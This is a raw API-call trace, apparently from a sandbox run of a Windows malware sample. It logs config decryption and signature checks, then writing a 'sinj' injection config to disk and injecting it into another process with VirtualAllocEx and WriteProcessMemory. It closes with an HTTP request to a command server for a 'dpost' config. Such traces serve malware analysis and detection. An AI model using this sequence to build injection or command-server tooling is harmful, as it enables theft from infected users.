	[0192.684] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.684] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.684] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.685] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.685] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0192.685] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.685] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303750
	[0192.685] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303750, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303750, pdwDataLen=0x1283b0) returned 1
	[0192.685] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.685] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.685] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.686] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.686] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0192.686] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.686] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303778, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303778, pdwDataLen=0x1283b0) returned 1
	[0192.686] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.686] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.686] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.686] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.686] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0192.687] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.687] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23037a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23037a0, pdwDataLen=0x1283b0) returned 1
	[0192.687] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.687] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.687] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.687] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.687] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0192.687] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.687] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23037c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23037c8, pdwDataLen=0x1283b0) returned 1
	[0192.687] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.687] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.688] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.688] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.688] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0192.688] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.688] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23037f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23037f0, pdwDataLen=0x1283b0) returned 1
	[0192.688] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.688] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.688] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.689] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.689] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0192.689] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.689] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303818, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303818, pdwDataLen=0x1283b0) returned 1
	[0192.689] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.689] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.689] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.690] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.690] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0192.690] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.690] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303840, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303840, pdwDataLen=0x1283b0) returned 1
	[0192.690] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.690] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.690] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.691] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.691] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0192.691] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.691] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303868, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303868, pdwDataLen=0x1283b0) returned 1
	[0192.691] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.691] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.691] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.691] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.691] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0192.692] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.692] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303890, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303890, pdwDataLen=0x1283b0) returned 1
	[0192.692] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.692] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.692] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.693] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.693] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0192.693] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.693] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23038b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23038b8, pdwDataLen=0x1283b0) returned 1
	[0192.693] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.693] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.693] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.694] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.694] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0192.694] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.694] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23038e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23038e0, pdwDataLen=0x1283b0) returned 1
	[0192.694] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.694] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.694] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2753bd8) returned 1
	[0192.694] CryptAcquireContextW (in: phProv=0x1283dc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283dc*=0x225748) returned 1
	[0192.694] CryptImportKey (in: hProv=0x225748, pbData=0x1283a4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x1283e4 | out: phKey=0x1283e4*=0x22b6940) returned 1
	[0192.695] CryptSetKeyParam (hKey=0x22b6940, dwParam=0x4, pbData=0x1283d0*=0x1, dwFlags=0x0) returned 1
	[0192.695] CryptSetKeyParam (hKey=0x22b6940, dwParam=0x1, pbData=0x23038e0, dwFlags=0x0) returned 1
	[0192.697] CryptDecrypt (in: hKey=0x22b6940, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2772bb8, pdwDataLen=0x1283d8 | out: pbData=0x2772bb8, pdwDataLen=0x1283d8) returned 1
	[0192.698] CryptDestroyKey (hKey=0x22b6940) returned 1
	[0192.698] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.698] GetVersion () returned 0x1db10106
	[0192.698] CryptAcquireContextW (in: phProv=0x1282e4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1282e4*=0x225748) returned 1
	[0192.699] CryptCreateHash (in: hProv=0x225748, Algid=0x800d, hKey=0x0, dwFlags=0x0, phHash=0x1282e8 | out: phHash=0x1282e8) returned 1
	[0192.699] CryptHashData (hHash=0x22b6900, pbData=0x2772bb8, dwDataLen=0x14d10, dwFlags=0x0) returned 1
	[0192.700] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1282e0, pdwDataLen=0x1282dc, dwFlags=0x0 | out: pbData=0x1282e0, pdwDataLen=0x1282dc) returned 1
	[0192.700] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5b60
	[0192.700] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x22a5b60, pdwDataLen=0x1282e0, dwFlags=0x0 | out: pbData=0x22a5b60, pdwDataLen=0x1282e0) returned 1
	[0192.700] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.700] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.700] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x1283e4, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x1283e4) returned 0x0
	[0192.701] BCryptImportKeyPair (in: hAlgorithm=0x22ee2a8, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x1283ec, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x1283ec) returned 0x0
	[0192.705] BCryptGetProperty (in: hObject=0x2299ad0, pszProperty="SignatureLength", pbOutput=0x128404, cbOutput=0x4, pcbResult=0x1283dc, dwFlags=0x0 | out: pbOutput=0x128404, pcbResult=0x1283dc) returned 0x0
	[0192.705] BCryptVerifySignature (hKey=0x2299ad0, pPaddingInfo=0x0, pbHash=0x22a5b60, cbHash=0x30, pbSignature=0x27878c8, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0192.710] BCryptDestroyKey (in: hKey=0x2299ad0 | out: hKey=0x2299ad0) returned 0x0
	[0192.710] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee2a8, dwFlags=0x0 | out: hAlgorithm=0x22ee2a8) returned 0x0
	[0192.710] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5b60) returned 1
	[0192.710] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x14d10) returned 0x2787940
	[0192.711] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23024e0) returned 1
	[0192.711] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23038e0) returned 1
	[0192.711] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2772bb8) returned 1
	[0192.711] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs")) returned 0x2010
	[0192.711] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ac
	[0192.712] WriteFile (in: hFile=0x4ac, lpBuffer=0x2732590*, nNumberOfBytesToWrite=0x14db0, lpNumberOfBytesWritten=0x128444, lpOverlapped=0x0 | out: lpBuffer=0x2732590*, lpNumberOfBytesWritten=0x128444*=0x14db0, lpOverlapped=0x0) returned 1
	[0192.716] CloseHandle (hObject=0x4ac) returned 1
	[0192.719] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128454 | out: lpSystemTimeAsFileTime=0x128454*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) 
	[0192.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sinj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
	[0192.719] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff3a8
	[0192.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sinj", cchWideChar=-1, lpMultiByteStr=0x22ff3a8, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sinj", lpUsedDefaultChar=0x0) returned 5
	[0192.719] lstrlenA (lpString="sinj") returned 4
	[0192.719] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0192.719] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ff3a8*, nSize=0x5, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x22ff3a8*, lpNumberOfBytesWritten=0x127f34*=0x5) returned 1
	[0192.720] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x14d08, flAllocationType=0x3000, flProtect=0x40) returned 0x230000
	[0192.720] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x230000, lpBuffer=0x2787940*, nSize=0x14d08, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x2787940*, lpNumberOfBytesWritten=0x127f34*=0x14d08) returned 1
	[0192.724] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x250000
	[0192.724] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x250000, lpBuffer=0x127fc0*, nSize=0x400, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x127fc0*, lpNumberOfBytesWritten=0x127f34*=0x400) returned 1
	[0192.725] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x40) returned 0x5c0000
	[0192.725] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5c0000, lpBuffer=0x1283c0*, nSize=0x80, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x1283c0*, lpNumberOfBytesWritten=0x127f34*=0x80) returned 1
	[0192.726] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x5d0000
	[0192.726] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x127eb4, nSize=0x70, lpNumberOfBytesRead=0x127e94 | out: lpBuffer=0x127eb4*, lpNumberOfBytesRead=0x127e94*=0x70) returned 1
	[0192.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5b60
	[0192.726] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x40) returned 0x5e0000
	[0192.726] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5e0000, lpBuffer=0x22a5b60*, nSize=0x2c, lpNumberOfBytesWritten=0x127e8c | out: lpBuffer=0x22a5b60*, lpNumberOfBytesWritten=0x127e8c*=0x2c) returned 1
	[0192.727] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x127eb4*, nSize=0x70, lpNumberOfBytesWritten=0x127e8c | out: lpBuffer=0x127eb4*, lpNumberOfBytesWritten=0x127e8c*=0x70) returned 1
	[0192.728] ResetEvent (hEvent=0x478) returned 1
	[0192.728] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0193.289] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x127eb4, nSize=0x70, lpNumberOfBytesRead=0x127e8c | out: lpBuffer=0x127eb4*, lpNumberOfBytesRead=0x127e8c*=0x70) returned 1
	[0193.289] VirtualFreeEx (hProcess=0x47c, lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0193.290] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5b60) returned 1
	[0193.290] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5c0000, lpBuffer=0x1283c0, nSize=0x80, lpNumberOfBytesRead=0x127f48 | out: lpBuffer=0x1283c0*, lpNumberOfBytesRead=0x127f48*=0x80) returned 1
	[0193.290] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x250000, lpBuffer=0x127fc0, nSize=0x400, lpNumberOfBytesRead=0x127f48 | out: lpBuffer=0x127fc0*, lpNumberOfBytesRead=0x127f48*=0x400) returned 1
	[0193.290] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5d0004, lpBuffer=0x127f74, nSize=0x4, lpNumberOfBytesRead=0x127f48 | out: lpBuffer=0x127f74*, lpNumberOfBytesRead=0x127f48*=0x4) returned 1
	[0193.290] VirtualFreeEx (hProcess=0x47c, lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0193.290] VirtualFreeEx (hProcess=0x47c, lpAddress=0x5c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0193.290] VirtualFreeEx (hProcess=0x47c, lpAddress=0x230000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0193.291] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0193.291] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2787940) returned 1
	[0193.291] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732590) returned 1
	[0193.295] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0193.295] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128454 | out: lpSystemTimeAsFileTime=0x128454*(dwLowDateTime=0x5cc0ccc0, dwHighDateTime=0x1d50a6a)) 
	[0193.295] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128454 | out: lpSystemTimeAsFileTime=0x128454*(dwLowDateTime=0x5cc0ccc0, dwHighDateTime=0x1d50a6a)) 
	[0193.295] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23038e0
	[0193.295] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6490) returned 1
	[0193.295] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6490
	[0193.295] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0193.295] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0193.295] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/dpost/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0193.296] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x127b44, dwBufferLength=0x4) returned 1
	[0193.296] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0193.750] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0193.750] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x127b34, lpdwBufferLength=0x127b30, lpdwIndex=0x0 | out: lpBuffer=0x127b34*, lpdwBufferLength=0x127b30*=0x4, lpdwIndex=0x0) returned 1
	[0193.750] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x3a0) returned 1
	[0193.750] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x3a0) returned 0x26ce2e8
	[0193.750] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26ce2e8, dwNumberOfBytesToRead=0x3a0, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26ce2e8*, lpdwNumberOfBytesRead=0x127b30*=0x3a0) returned 1
	[0193.750] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x0) returned 1
	[0193.750] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23038e0) returned 1
	[0193.750] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2753bd8
	[0193.750] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.751] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.751] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0193.751] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.751] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23038e0
	[0193.751] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23038e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23038e0, pdwDataLen=0x1283b0) returned 1
	[0193.751] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.751] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.751] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.751] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.751] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0193.751] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.752] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23024e0
	[0193.752] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23024e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23024e0, pdwDataLen=0x1283b0) returned 1
	[0193.752] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.752] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.752] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.752] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.752] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x60, dwFlags=0x0) returned 1
